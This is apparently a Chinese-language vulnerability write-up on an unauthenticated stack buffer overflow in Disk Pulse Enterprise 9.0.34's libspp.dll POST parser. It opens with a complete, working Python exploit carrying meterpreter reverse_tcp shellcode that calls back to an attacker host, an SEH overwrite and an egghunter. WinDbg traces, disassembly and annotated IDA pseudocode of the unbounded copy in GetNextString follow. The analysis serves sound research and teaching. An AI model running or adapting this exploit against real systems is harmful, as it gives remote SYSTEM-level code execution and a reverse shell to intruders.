作者:k0shl 转载请注明出处:http://whereisk0shl.top
漏洞说明
软件下载:
https://www.exploit-db.com/apps/a679e77e57bf178b22bff5e86409a451-diskpulseent_setup_v9.0.34.exe
PoC:
#!/usr/bin/python
# Public PoC reproduced here for the analysis that follows (Python 2: print
# statements, str is bytes). What it sends, in order: an HTTP POST /login
# with a form body, a run of 'A' padding, the "w00tw00t" egg tag followed
# by the shellcode, 'B' padding, the overwritten SEH record (nSEH + handler
# address), an egghunter and a long NOP filler.
# From a detection standpoint the request is not subtle: a POST /login whose
# body is tens of KB of repeated 0x41/0x42/0x90 bytes. The parser in
# libspp.dll copies the second form field byte-by-byte into a fixed stack
# buffer with no destination bound (see the GetNextString analysis below).
print "Disk Pulse Enterprise 9.0.34 Buffer Overflow Exploit"
print "Author: Tulpa // tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa-security.com
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Greetings to ozzie_offsec and carbonated
#Special Shoutout to unfo- for making me look closer
import socket
import sys
# The TCP connection is opened before the request is built. The target
# address is hard-coded here and repeated in the Host header below.
# socket.connect() returns None, so the `connect` name is never used.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.132',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
# `buf` is the encoded stage emitted by the msfvenom command above (308
# bytes per the author). It is opaque data as far as this script is
# concerned; the bad-char list matches the delimiters the parser stops on
# (0x00 terminator, '\n', '\r', '&' = 0x26).
buf = ""
buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
#pop pop ret 1001A333
# nSEH (the "next" pointer of the overwritten SEH record): two NOPs and a
# short forward jump, so execution lands in the NOP sled before the egghunter
# once the handler below returns into this record.
nseh = "\x90\x90\xEB\x0B"
# Overwritten handler pointer: 0x1001A333 in little-endian byte order, the
# pop/pop/ret address named in the comment above (same 0x100xxxxx range as
# the libspp.dll symbols in the debugger trace, so presumably in that DLL;
# the author does not say which module it was taken from).
seh = "\x33\xA3\x01\x10"
# 32-byte egghunter (the author attributes it to mona). The bytes
# \x77\x30\x30\x74 are ASCII "w00t", the tag it looks for; it matches the
# "w00tw00t" marker placed in front of `buf` further down.
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# Request headers. The Host value duplicates the hard-coded IP used for the
# connection above. NOTE(review): the declared Content-Length (17000) does
# not match the body actually assembled below (roughly 21 KB with a
# 308-byte `buf`); the server evidently reads the full body regardless,
# as the trace shows a3 = 0x4268 bytes reaching ExtractPostData.
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: textml,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
# Body. GetNextString splits it on '&', '\r' and '\n'; "username=admin" is
# the first token and "password=aaaaa" the second. The "\r\n" after the
# password ends that token, so everything from the 'A' run onward is copied
# as one more field into the same fixed stack buffer.
evil += "username=admin"
evil += "&password=aaaaa\r\n"
# Padding that positions the egg/shellcode; the author notes it must be
# re-tuned if the shellcode size changes.
evil += "\x41" * 12292 #subtract/add for payload
# Egg tag immediately followed by a small NOP sled and the shellcode.
evil += "w00tw00t"
evil += "\x90" * 20
evil += buf
evil += "\x90" * 50
# Filler up to the SEH record, then the overwritten record itself.
evil += "\x42" * 1614
evil += nseh
evil += seh
# NOP sled reached by the nSEH jump, the egghunter, and a long tail that
# keeps the copy running until the write faults (ds:0023:01700000 in the
# trace), which is what hands control to the overwritten handler.
evil += "\x90" * 20
evil += egghunter
evil += "\x90" * 7000
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
测试环境:
Windows xp sp3
IDA pro
Windbg
这里的PoC实现了exploit功能,使用的是mona的egghunter,在调试的时候,可以把seh和egghunter包括payload部分全部替换成畸形字符串 \x41,运行Disk Pulse Enterprise,可以看到80端口开放,这时候执行PoC,即可引发软件崩溃。
漏洞复现
Disk Pulse Enterprise是一款监视磁盘变化的软件,它可以通过一个管理端口9120或者web管理窗口80对软件进行连接管理,从而监视磁盘的变化情况。在Disk Pulse Enterprise中有一个动态链接库libspp.dll,其中有一些负责http操作的函数,问题就出现在这个动态链接库中,在处理post数据时,由于对post数据没有进行严格的长度控制,导致在获取post数据时向无效内存拷贝数据造成缓冲区溢出,触发seh异常处理,最后控制eip,执行任意代码。下面对此漏洞进行详细分析。
首先发送payload,另一边触发崩溃,附加windbg,到达漏洞位置。
(7dc.10c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000386b ebx=00004268 ecx=016fd041 edx=0000384c esi=016fc7b4 edi=0016b6a4
eip=10092822 esp=016fba70 ebp=016fcfd8 iopl=0 nv up ei ng nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010287
libspp!SCA_HttpParser::GetNextString+0x52:
10092822 880c32 mov byte ptr [edx+esi],cl ds:0023:01700000=??
这里调用了libspp.dll中SCA_HttpParser的GetNextString函数,接下来程序进入SEH异常处理,通过覆盖SEH Handler达到代码执行。
0:011> g
(7dc.10c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9232bc esi=00000000 edi=00000000
eip=41414141 esp=016fb6a0 ebp=016fb6c0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
41414141 ?? ???
漏洞分析
在libspp中SCA_HttpParser类负责处理HTTP的一些相关操作,其中有一个函数名为ExtractPostData负责处理post数据,在这个函数入口下断点。
0:011> bp 10092510
*** WARNING: Unable to verify checksum for C:\Program Files\Disk Pulse Enterprise\bin\libspp.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Disk Pulse Enterprise\bin\libspp.dll -
0:011> bl
0 e 10092510 0001 (0001) 0:**** libspp!SCA_HttpParser::ExtractPostData
0:011> g
Breakpoint 0 hit
eax=0000016c ebx=016fd120 ecx=016fd00c edx=0016b6a4 esi=016fd730 edi=101b0c42
eip=10092510 esp=016fcfb4 ebp=016fd00c iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
libspp!SCA_HttpParser::ExtractPostData:
10092510 b810150000 mov eax,1510h
发送payload之后命中断点,此时观察一下传参情况。
0:011> dd esp
016fcfb4 10091d23 0016b6a4 00004268 016fcfd8
016fcfc4 016fd730 0016d771 000043d4 00b1a310
0:011> dc 0016b6a4
0016b6a4 72657375 656d616e 6d64613d 70266e69 username=admin&p
0016b6b4 77737361 3d64726f 61616161 410a0d61 assword=aaaaa..A
0016b6c4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0016b6d4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0016b6e4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0016b6f4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0016b704 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
post数据作为第二个参数传入,注意是完整传入,这里继续单步跟踪,到达之前说到的GetNextString函数。
0:011> p
eax=0016b6a4 ebx=00000000 ecx=016fd00c edx=00004268 esi=016fd730 edi=016fd00c
eip=10092554 esp=016fba84 ebp=016fd00c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
libspp!SCA_HttpParser::ExtractPostData+0x44:
10092554 e877020000 call libspp!SCA_HttpParser::GetNextString (100927d0)
0:011> dd esp
016fba84 0016b6a4 00004268 016fcfd8 016fc7b4
0:011> dc poi(esp)
0016b6a4 72657375 656d616e 6d64613d 70266e69 username=admin&p
0016b6b4 77737361 3d64726f 61616161 410a0d61 assword=aaaaa..A
0016b6c4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0016b6d4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0016b6e4 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
这个函数会做一件事情,就是将第一个参数,也就是post数据进行拆分,将每一部分分离出来作为后续处理,单步步过,可以看到第一次进入GetNextString之后,拆分了第一个数据。
0:011> p
eax=00000001 ebx=00000000 ecx=016fd026 edx=0000000e esi=016fd730 edi=016fd00c
eip=10092559 esp=016fba94 ebp=016fd00c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
libspp!SCA_HttpParser::ExtractPostData+0x49:
10092559 85c0 test eax,eax
0:011> dd 016fcfd8
016fcfd8 0000000e 1008cc39 0016b538 000043d4
016fcfe8 0000016c 016fd120 00000000 00b1a310
0:011> dc 16fc7b4
016fc7b4 72657375 656d616e 6d64613d 00006e69 username=admin..
第一次分离出来了username,接下来,再次进入GetNextString开始拆分第二个String,这个拆分过程会执行一系列的拷贝操作。
.text:10092814 loc_10092814: ; CODE XREF: SCA_HttpParser::GetNextString(char const *,ulong,ulong *,char *)+5E_x0019_j
.text:10092814 cmp cl, 0Ah
.text:10092817 jz short loc_10092830
.text:10092819 cmp cl, 0Dh
.text:1009281C jz short loc_10092830
.text:1009281E cmp eax, ebx
.text:10092820 jnb short loc_10092830
.text:10092822 mov [edx+esi], cl
.text:10092825 mov cl, [eax+edi+1]
.text:10092829 inc edx
.text:1009282A inc eax
.text:1009282B cmp cl, 26h
.text:1009282E jnz short loc_10092814
这个loc块负责拷贝,其中10092822地址就是触发漏洞的关键位置,esi是目标缓冲区首地址,edx是已拷贝的长度(写入偏移),cl是拷贝内容,这里是逐字节拷贝的。
因此,当超过开辟缓冲区大小的时候,就会引发向无效地址拷贝的问题。
eax=0000386b ebx=00004268 ecx=016fd041 edx=0000384c esi=016fc7b4 edi=0016b6a4
eip=10092822 esp=016fba70 ebp=016fcfd8 iopl=0 nv up ei ng nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010287
libspp!SCA_HttpParser::GetNextString+0x52:
10092822 880c32 mov byte ptr [edx+esi],cl ds:0023:01700000=??
看一下edx+esi的值,可以看到,后面已经超过了开辟缓冲区的大小,后面就是无效缓冲区了。
0:011> dc 016fc7b4+3840
016ffff4 41414141 41414141 41414141 ???????? AAAAAAAAAAAA????
01700004 ???????? ???????? ???????? ???????? ????????????????
01700014 ???????? ???????? ???????? ???????? ????????????????
之后来看一下ecx的值
0:011> dd ecx
016fd041 41414141 41414141 41414141 41414141
016fd051 41414141 41414141 41414141 41414141
016fd061 41414141 41414141 41414141 41414141
016fd071 41414141 41414141 41414141 41414141
016fd081 41414141 41414141 41414141 41414141
016fd091 41414141 41414141 41414141 41414141
cl即ecx的低字节,拷贝时逐字节写入目标缓冲区,这里由于向无效地址拷贝,引发SEH异常处理,最后达到代码执行。来看一下伪代码。
// Decompiled (IDA) pseudocode of libspp!SCA_HttpParser::ExtractPostData as
// abbreviated by the author: "……" marks the elided loop body, and LABEL_17
// and the declaration of v28 are not shown.
// From the debugger trace above: a2 is the raw POST body (0016b6a4), a3 its
// length (0x4268), a4 the scan cursor (016fcfd8, holding 0xe after the first
// field), and v28 the local buffer at 016fc7b4 that receives each field.
int __thiscall SCA_HttpParser::ExtractPostData(SCA_HttpParser *this, const char *a2, unsigned __int32 a3, unsigned __int32 *a4, struct
SCA_ConfigObj *a5)
{
v19 = this;
v16 = 0;
v18 = 0;
v17 = 0;
// First field ("username=admin" in the trace). &v28 is passed with no
// capacity argument: GetNextString bounds its reads by a3 but never its
// writes into v28, so the size of v28 is the only limit and it is never
// communicated to the callee.
if ( SCA_HttpParser::GetNextString(a2, a3, a4, &v28) )
{
while ( 1 )
{
……
LABEL_18:
// Every further field is copied into the same v28 buffer. An over-long
// value (the 'A' run after "password=aaaaa\r\n" in the PoC) overruns it;
// the trace shows the copy continuing until the write faults and the
// overwritten SEH record takes over.
if ( !SCA_HttpParser::GetNextString(a2, a3, a4, &v28) )
return 1;
}
v15 = 1;
goto LABEL_17;
}
return 1;
}
再来看一下GetNextString函数的伪代码。
// Decompiled (IDA) pseudocode of libspp!SCA_HttpParser::GetNextString.
// Extracts the next token of the POST body a2 (length a3), starting at the
// cursor *a4, into a5 and advances *a4 to the delimiter that ended it.
// Tokens are separated by '&' (38), '\n' (10) or '\r' (13).
// Returns 1 when a token was written to a5, 0 when the input is exhausted.
//
// Defect: a5 is a bare char* with no capacity. Every bound in this function
// (i < a3) limits the SOURCE index only; the destination index v4 is never
// compared against anything. A token longer than the caller's buffer
// (v28 on ExtractPostData's stack, 016fc7b4 in the trace) is written past
// its end, which is the `mov [edx+esi], cl` at 10092822. A fix has to carry
// the destination capacity into this function (or the caller must cap the
// body/field length before calling it).
int __stdcall SCA_HttpParser::GetNextString(const char *a2, unsigned __int32 a3, unsigned __int32 *a4, char *a5)
{
int v4; // edx@1
unsigned __int32 i; // eax@1
char v6; // cl@2
char v7; // cl@6
int result; // eax@13
// v4 is the write offset into a5 (edx in the disassembly above).
v4 = 0;
// Skip any leading delimiter characters from the current cursor.
for ( i = *a4; i < a3; ++i )
{
v6 = a2[i];
if ( v6 != 38 && v6 != 10 && v6 != 13 )
break;
}
// NOTE(review): a2[i] is read before the i < a3 check on the next line, so
// when the skip loop ran to the end this reads one byte past a3 (harmless
// if the body is NUL-terminated, which the pseudocode does not guarantee).
v7 = a2[i];
if ( v7 && i < a3 )
{
// Copy loop: stops at '&', '\n', '\r' or the end of the SOURCE buffer.
for ( ; v7 != 38; ++i )
{
if ( v7 == 10 )
break;
if ( v7 == 13 )
break;
if ( i >= a3 )
break;
// Unbounded write: no check of v4 against the size of a5. This is the
// overflow; in the PoC it runs through the 'A'/'B' padding and the
// crafted SEH record until [a5 + v4] reaches unmapped memory.
a5[v4] = v7;
// NOTE(review): reads a2[i + 1] while i may equal a3 - 1, i.e. one byte
// past the stated source length; the next iteration's i >= a3 check only
// stops the write, not this read.
v7 = a2[i + 1];
++v4;
}
// Terminator is written with the same unchecked index.
a5[v4] = 0;
// Leave the cursor on the delimiter; the skip loop above steps over it
// on the next call.
*a4 = i;
result = 1;
}
else
{
result = 0;
}
return result;
}